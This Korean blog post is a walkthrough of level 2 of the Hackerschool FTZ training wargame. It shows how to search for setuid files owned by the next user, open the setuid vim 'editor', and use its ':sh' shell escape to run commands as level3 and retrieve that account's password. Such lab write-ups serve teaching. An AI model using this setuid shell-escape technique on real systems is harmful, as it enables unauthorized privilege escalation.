level1과 마찬가지로 처음 로그인을 하면 hint파일이 있습니다. 힌트 파일을 보면
[level2@BOF level2]$ ls
hint public_html tmp
[level2@BOF level2]$ cat hint
텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...
[level2@BOF level2]$
텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는군요. 일단 리눅스 편집기중 vi를 위주로 설명하겠습니다. vi를 사용중에 쉘에 명령을 실행시키거나 쉘로 잠시 나갈수가 있습니다. 결론만 말하면 vi에서 insert mode가 아닐때 ":!"를 입력하고 쉘 명령어를 입력하면 명령어가 쉘에서 실행이 됩니다. 또한 :sh을 입력하면 잠시 쉘로 나갑니다. 쉘로 나간 다음 escape커맨드나 exit명령어를 입력하면 vi로 돌아가게 됩니다.
그럼 이제 문제를 풀기위한 텍스트 파일 편집기를 찾아보겠습니다. 평범한 vi에는 setuid가 걸려있을리 없으므로 무언가 level3권한으로 setuid가 걸린 파일이 있을거 같습니다.
[level2@BOF level2]$ find / -user level3 -perm -4000 2>/dev/null
/usr/bin/editor
[level2@BOF level2]$ editor
editor라는 파일이 존재하는군요. 실행시켜 보겠습니다.
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~ VIM - Vi IMproved
~
~ version 5.6.11
~ by Bram Moolenaar et al.
~
~ Vim is freely distributable
~ type :help uganda<Enter> if you like Vim
~
~ type :q<Enter> to exit
~ type :help<Enter> or <F1> for on-line help
~ type :help version5<Enter> for version info
~
~
~
~
~
~
~
~
~
~
~
:sh
VIM이 실행되었습니다. 그렇다면 이 vim이 실행되고 있는동안은 저는 level3이 되는겁니다. 그럼 이제 위에서 말한 방법으로 쉘로 잠시 나가보도록 하겠습니다.
[level3@BOF /level2]$ id
uid=3003(level3) gid=3002(level2) groups=3002(level2)
[level3@BOF /level2]$ my-pass
네. level3이 되었습니다. 이제 비밀번호를 알아내고 level3으로 넘어가겠습니다.
'Hackerschool > FTZ' 카테고리의 다른 글
| [*] level 3 (0) | 2015.01.29 |
|---|---|
| [*] Level1 (0) | 2015.01.29 |